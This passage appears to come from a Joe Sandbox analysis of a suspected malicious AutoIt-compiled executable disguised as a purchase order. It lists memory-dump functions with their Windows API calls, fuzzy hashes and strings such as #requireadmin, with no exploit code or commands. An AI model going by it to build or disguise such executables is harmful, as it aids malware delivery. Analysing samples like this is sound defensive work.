Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0ef47895ff3c34fcde57304505890fa0abfee302c764309beada644b67fe252c
Instruction ID: 611ed22d8254807c85b721b2519c9d3a91f4afa22137adc93f8eb9d36c6173eb
Opcode Fuzzy Hash: 0ef47895ff3c34fcde57304505890fa0abfee302c764309beada644b67fe252c
Instruction Fuzzy Hash: CD318D72601214BFEB148F50CC49FEB3BAAEF49715F044169FE09EA291D6B99841CB78

Function 00470133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetSystemMetrics.USER32(0000000F), ref: 0047016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0047038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004703AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 004703D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004703FF
ShowWindow.USER32(00000003,00000000), ref: 00470421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00470440

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
Instruction ID: 173c988fa6835b5105b4736bd6ec62156792104ef1851415c511a9b98474d389
Opcode Fuzzy Hash: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
Instruction Fuzzy Hash: 87A1AF35601616EBDB18CF68C9857FEBBB1BF04700F04C16AEC58AB291D778AD61CB94

Function 0041AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
Instruction ID: 443efc5314a38a124e106a75654bdb1c3ac73b7b7c16e89892f607a707915728
Opcode Fuzzy Hash: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
Instruction Fuzzy Hash: 74717E70901109EFCB04CF99CC48AEFBB75FF89314F14855AF915AA251C7389A52CFA9

Function 00462230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046225A
_memset.LIBCMT ref: 00462323
ShellExecuteExW.SHELL32(?), ref: 00462368

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

CloseHandle.KERNEL32(00000000), ref: 0046242F
FreeLibrary.KERNEL32(00000000), ref: 0046243E

Strings

@, xrefs: 00462334

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 9b6f1a054f74875a438f1efdd3d3d791c853387bcbe02570d37d45342aca0f8c
Instruction ID: fe3cf0ec08732bc4d8dc6c0a237379d0b91af6d135dd8010ae47e82a7a5a3c8a
Opcode Fuzzy Hash: 9b6f1a054f74875a438f1efdd3d3d791c853387bcbe02570d37d45342aca0f8c
Instruction Fuzzy Hash: FC716D70A00619AFCF04EFA5C98199EB7F5FF48314F10846EE855AB391DB78AD40CB99

Function 00AF7B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AF8311,?,00000000,?,00000000,00000000), ref: 00AF7BDE
__fassign.LIBCMT ref: 00AF7C59
__fassign.LIBCMT ref: 00AF7C74
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AF7C9A
WriteFile.KERNEL32(?,?,00000000,00AF8311,00000000,?,?,?,?,?,?,?,?,?,00AF8311,?), ref: 00AF7CB9
WriteFile.KERNEL32(?,?,00000001,00AF8311,00000000,?,?,?,?,?,?,?,?,?,00AF8311,?), ref: 00AF7CF2

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e6ef110b9b17d87514d4a24bdfd6fe75715798999cf150abff4218e7e393e27d
Instruction ID: 134fac3034e7b65fffc3290ee96a2fb8353641dfa9916a36bd7d7ccba50d1b3e
Opcode Fuzzy Hash: e6ef110b9b17d87514d4a24bdfd6fe75715798999cf150abff4218e7e393e27d
Instruction Fuzzy Hash: 425181B1A042499FDB10CFE8DC85AFEBBB8EF09300F14455AFA55E7291DB709941CBA0

Function 00468FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00468FE7
GetWindowLongW.USER32(00BDE7E8,000000F0), ref: 0046901A
GetWindowLongW.USER32(00BDE7E8,000000F0), ref: 0046904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00469081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004690AB
GetWindowLongW.USER32(00000000,000000F0), ref: 004690BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004690D6

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
Instruction ID: 6c1353d9cf321ea898b21e40fd174f800445483b6db885a06172db092e97f94c
Opcode Fuzzy Hash: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
Instruction Fuzzy Hash: E7313934700215DFDB20CF58DC84F6537A9FB4A718F14026AF5199B2B2DBB5AC40DB4A

Function 004408AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004408F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00440918
SysAllocString.OLEAUT32(00000000), ref: 0044091B
SysAllocString.OLEAUT32(?), ref: 00440939
SysFreeString.OLEAUT32(?), ref: 00440942
StringFromGUID2.OLE32(?,?,00000028), ref: 00440967
SysAllocString.OLEAUT32(?), ref: 00440975

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b24e518320327f0b4010ffb938235285796caa2b644ac18e69922b42e27cb196
Instruction ID: 670d1140b47f98b37c90b3f1203f5f0870597e9ef3b46a752cba0966611f4e2a
Opcode Fuzzy Hash: b24e518320327f0b4010ffb938235285796caa2b644ac18e69922b42e27cb196
Instruction Fuzzy Hash: 81219776601219AFEB10AF78DC88DAF73ACEF09360B048526FA15DB291D674EC458768

Function 00442472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00442485
__wcsnicmp.LIBCMT ref: 004424A6
__wcsnicmp.LIBCMT ref: 004424C0

Strings

#requireadmin, xrefs: 004424A0
#OnAutoItStartRegister, xrefs: 004424BA
#notrayicon, xrefs: 0044247D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 6ee497fbd8dcfb68008fdf971b16c8ec8fe694fdf8472433a62bfcb0ad220d0f
Instruction ID: a173347789446804f2164791aadcb3723f806e4114576909bb7f9119596bce02
Opcode Fuzzy Hash: 6ee497fbd8dcfb68008fdf971b16c8ec8fe694fdf8472433a62bfcb0ad220d0f
Instruction Fuzzy Hash: CF216A7160012177E620E6359E12FB77398EF64308FA0402BF446A7182E6ED9982C2AD

Function 00440986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409F1
SysAllocString.OLEAUT32(00000000), ref: 004409F4
SysAllocString.OLEAUT32 ref: 00440A15
SysFreeString.OLEAUT32 ref: 00440A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00440A38
SysAllocString.OLEAUT32(?), ref: 00440A46

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 81d704a8231c4c79e209fcaaa51a40eda706f52577222d1ed10484e04eabf31d
Instruction ID: 220da2e8b19451a2a961b14a861e80d9e5b321ba20eb580aa9f72d8ab3c780ef
Opcode Fuzzy Hash: 81d704a8231c4c79e209fcaaa51a40eda706f52577222d1ed10484e04eabf31d
Instruction Fuzzy Hash: 28219B75601204AFEB10EFB8DD89DAB77ECEF183607048536FA09DB2A1D674EC458B58

Function 0046A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0046A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0046A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0046A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0046A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0046A360

Strings

Msctls_Progress32, xrefs: 0046A2FE

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
Instruction ID: c087a3ff2feba92329301fd61567ed14b88ced6f3f48c980a85726e2cd280ca0
Opcode Fuzzy Hash: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
Instruction Fuzzy Hash: 4911D0B1500219BEEF104F61CC85EEB7F6DFF08398F014115BA08A21A0D7769C22DBA8

Function 00AF3216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AF31DA: _free.LIBCMT ref: 00AF3203

_free.LIBCMT ref: 00AF3264

Part of subcall function 00AF2096: HeapFree.KERNEL32(00000000,00000000,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?), ref: 00AF20AC
Part of subcall function 00AF2096: GetLastError.KERNEL32(?,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?,?), ref: 00AF20BE

_free.LIBCMT ref: 00AF326F
_free.LIBCMT ref: 00AF327A
_free.LIBCMT ref: 00AF32CE
_free.LIBCMT ref: 00AF32D9
_free.LIBCMT ref: 00AF32E4
_free.LIBCMT ref: 00AF32EF

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction ID: 46eb930caef067ce3e916823c9bfc53fe8dd452e61fdd256a50382c498783b4d
Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction Fuzzy Hash: E4110D73A40B0CAADE30FBF0CE07FEB779C6F05700F404A15BB9A66152DA65AA048754

Function 0041CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0041CCF6
GetWindowRect.USER32(?,?), ref: 0041CD37
ScreenToClient.USER32(?,?), ref: 0041CD5F
GetClientRect.USER32(?,?), ref: 0041CE8C
GetWindowRect.USER32(?,?), ref: 0041CEA5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
Instruction ID: 1cbbbf1eee6a61c32d83d92f802d5fff4e9bef6c0e677c0be53b69fc92052790
Opcode Fuzzy Hash: a95f9749c6526a6e85246753ac1fa92aeee7def737737484697f95a748c97b68
Instruction Fuzzy Hash: 1AB13C79900249DBDF10CFA9C9807EEB7B1FF08310F14956AEC59EB250DB34A991CB69

Function 00AF44E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00AF473A,?,?,00000000), ref: 00AF4543
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AF473A,?,?,00000000,?,?,?), ref: 00AF45C9
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AF46C3
__freea.LIBCMT ref: 00AF46D0

Part of subcall function 00AF32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AF332C

__freea.LIBCMT ref: 00AF46D9
__freea.LIBCMT ref: 00AF46FE

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a3355d76feca3b57a3069f657a714d9f7897b256eca8419d7edfe3f41662e12c
Instruction ID: 7812b9a43b210f238d159bcdbde8edf932708c75ce02de4f21d77435d9c30304
Opcode Fuzzy Hash: a3355d76feca3b57a3069f657a714d9f7897b256eca8419d7edfe3f41662e12c
Instruction Fuzzy Hash: 3F51C072A0021AABEB259FE4CD41EBF77A9EB49750F154628FE04DB290EB74DC90C650

Function 00462FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004630AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004630EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00463112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046317E
RegCloseKey.ADVAPI32(00000000), ref: 0046318B

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 924c1986b7ebbad1f92315ec979952a775d0fca8a3793fc76b765aabc7c5acbd
Instruction ID: 5892b1df70f304c10d3e3d6946ecdd82f90192a315b1b5be1dc16ffe62a05a2c
Opcode Fuzzy Hash: 924c1986b7ebbad1f92315ec979952a775d0fca8a3793fc76b765aabc7c5acbd
Instruction Fuzzy Hash: B8516A71504240AFC704EF65C881E6EBBF9FF89308F04492EF55597291EB39EA09CB5A

Function 004684DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00468540
GetMenuItemCount.USER32(00000000), ref: 00468577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0046859F
GetMenuItemID.USER32(?,?), ref: 0046860E
GetSubMenu.USER32(?,?), ref: 0046861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0046866D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
Instruction ID: 4a32b333b28820789701f84416726f710a670bfdff4336e242cca42d78ce286a
Opcode Fuzzy Hash: a46110f41c534e46656af0250ed6f5c62c57e53ba0c7fed20eca81b6107e52c7
Instruction Fuzzy Hash: 1751B371E00214AFCF11DF55C941AAEB7F4EF48314F10456EE906B7391EB78AE418B9A

Function 00444AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00444B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00444B5B
IsMenu.USER32(00000000), ref: 00444B7B
CreatePopupMenu.USER32 ref: 00444BAF
GetMenuItemCount.USER32(000000FF), ref: 00444C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00444C3E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3820e9dfeb55f95e393ec268290b3c8c75943d4e144a9b75cad08b804df57059
Instruction ID: e6a5e1f3890da4a0aceb300d286543e28b665d01a084fc0334bc1157647a2e2d
